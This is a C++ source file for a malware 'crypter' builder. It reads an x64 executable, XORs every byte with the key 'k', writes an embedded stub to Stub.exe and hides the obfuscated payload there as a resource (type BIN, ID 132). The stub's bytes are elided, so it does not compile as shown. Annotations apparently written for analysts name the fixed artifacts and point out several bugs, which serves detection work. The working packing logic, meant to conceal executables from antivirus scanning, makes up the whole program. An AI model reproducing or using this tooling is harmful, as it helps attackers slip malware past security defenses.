crypter.cpp
#include <iostream>
#include <windows.h>
#include <fstream>
using namespace std;
// Raw bytes of the pre-compiled stub executable; main() writes this array to disk
// unchanged as "Stub.exe". The leading 0x4D 0x5A is the ASCII "MZ" signature that
// opens a DOS/PE header. The rest of the 2462687-byte initializer is elided ("...")
// in this listing, so the file does not compile as shown.
unsigned char rawData[2462687] = { 0x4D, 0x5A, 0x90, ...};
// Builder entry point. Reads the file named by argv[1], checks that its PE file
// header reports the AMD64 machine type, XORs every byte with a fixed one-byte key,
// writes the embedded stub image (rawData) to "Stub.exe" in the current directory,
// and attaches the XORed bytes to that file as a resource of type "BIN", ID 132.
//
// Parameters:
//   argc, argv - standard command line; argv[1] is the input file path.
// Returns:
//   0 on every path, success or failure, so the exit code cannot be used to tell
//   whether the build worked; only the console text distinguishes the outcomes.
//
// Notes for analysts reading samples produced by this tool (all visible below):
//   - The transform is a single-byte XOR with 'k' (0x6B). That is obfuscation, not
//     encryption: XORing the resource bytes with the same constant restores the
//     original input exactly.
//   - Fixed static artifacts: output name "Stub.exe", resource type string "BIN",
//     integer resource ID 132.
int main(int argc, char* argv[]) {
HANDLE hCon = GetStdHandle( STD_OUTPUT_HANDLE ); // console handle, used only to change text colors
// Color attributes used throughout: 4 = red (error), 2 = green (success), 7 = default gray.
cout << "Checking input arguments... ";
if (argc < 2) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Start this program with arguments." << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
const char *resFile = argv[1];
// read input file
cout << "Reading input file... ";
FILE *fileptr;
char *fileBuff;
long filelen;
// NOTE(review): none of the stdio calls below have their results checked. A failed
// fopen() hands a null FILE* to fseek/ftell/fread/fclose, ftell() can return -1,
// and fread()'s return value is discarded, so a short read goes unnoticed.
fileptr = fopen(resFile, "rb"); // Open the file in binary mode
fseek(fileptr, 0, SEEK_END); // jump to the end of the file
filelen = ftell(fileptr); // get the current byte offset in the file
rewind(fileptr); // jump back to the beginning of the file
fileBuff = (char *)malloc(filelen * sizeof(char)); // alloc memory for the file
fread(fileBuff, filelen, 1, fileptr); // read in the entire file
fclose(fileptr);
// NOTE(review): this is the only failure check in the read step, and it tests the
// malloc() result after fread() has already written through the pointer.
if (fileBuff == NULL) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not read input file." << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// check if input file is a valid x64 PE
// NOTE(review): the only field actually tested is FileHeader.Machine. Neither the DOS
// signature (e_magic) nor the NT signature is compared, and e_lfanew is taken from the
// file and added to the buffer address without being checked against filelen, so a
// short or malformed input makes the Machine read fall outside the allocation.
cout << "Validate input file as x64 PE... ";
IMAGE_DOS_HEADER* _dosHeader = (PIMAGE_DOS_HEADER) fileBuff;
IMAGE_NT_HEADERS64* _ntHeader = (PIMAGE_NT_HEADERS64)(DWORD64(fileBuff) + _dosHeader->e_lfanew);
bool is64 = _ntHeader->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64;
if (!is64) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error. Input file is not a valid x64 PE" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// XOR every byte of the input with one constant byte
cout << "Encrypting data... ";
char key = 'k'; // 0x6B; the original comment says the compiled stub uses the same key
// NOTE(review): `encrypted` is a variable-length array, which is a compiler extension
// in C++ rather than standard C++, and its size is the whole input file. It is an
// array, not a pointer, so the NULL comparison below can never be true and that
// error branch is dead code.
char encrypted[filelen];
for (int i = 0; i < filelen; i++)
encrypted[i] = fileBuff[i] ^ key;
if (encrypted == NULL) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not encrypt the data" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// write Stub
// "Stub.exe" is a relative path, so the file is created in the current working directory.
cout << "Writing stub... ";
fstream bin ("Stub.exe",ios :: out | ios :: binary);
if (!bin.write(reinterpret_cast<const char *>(rawData), sizeof(rawData))) {
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not write the stub to disk" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
bin.close();
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// add the XORed data as a resource to the stub
cout << "Write encrypted resource to stub... ";
HANDLE hUpdateRes;
BOOL result;
hUpdateRes = BeginUpdateResource("Stub.exe", FALSE); // FALSE: keep the stub's existing resources
if (hUpdateRes == NULL)
{
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not open file for writing" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
// UpdateResource argument order is (handle, type, name, language, data, size):
// "BIN" is the resource type string and 132 is the resource name given as an integer ID.
result = UpdateResource(hUpdateRes, // update resource handle
"BIN", // resource type
MAKEINTRESOURCE(132), // resource name (integer ID 132)
NULL, // language id; NULL evaluates to 0 here
encrypted, // ptr to the XORed input bytes
filelen); // size of resource in bytes
// NOTE(review): on this failure path the update handle is never passed to
// EndUpdateResource before returning.
if (result == FALSE)
{
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not add resource" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
// write changes and then close (FALSE: commit the update rather than discard it)
if (!EndUpdateResource(hUpdateRes, FALSE))
{
SetConsoleTextAttribute( hCon, 4 );
cout << "Error: Could not write changes to file" << endl;
SetConsoleTextAttribute( hCon, 7 );
system("pause");
return 0;
}
SetConsoleTextAttribute( hCon, 2 );
cout << "Success" << endl;
SetConsoleTextAttribute( hCon, 7 );
// fileBuff is never freed; the process exits immediately after the pause.
system("pause");
return 0;
}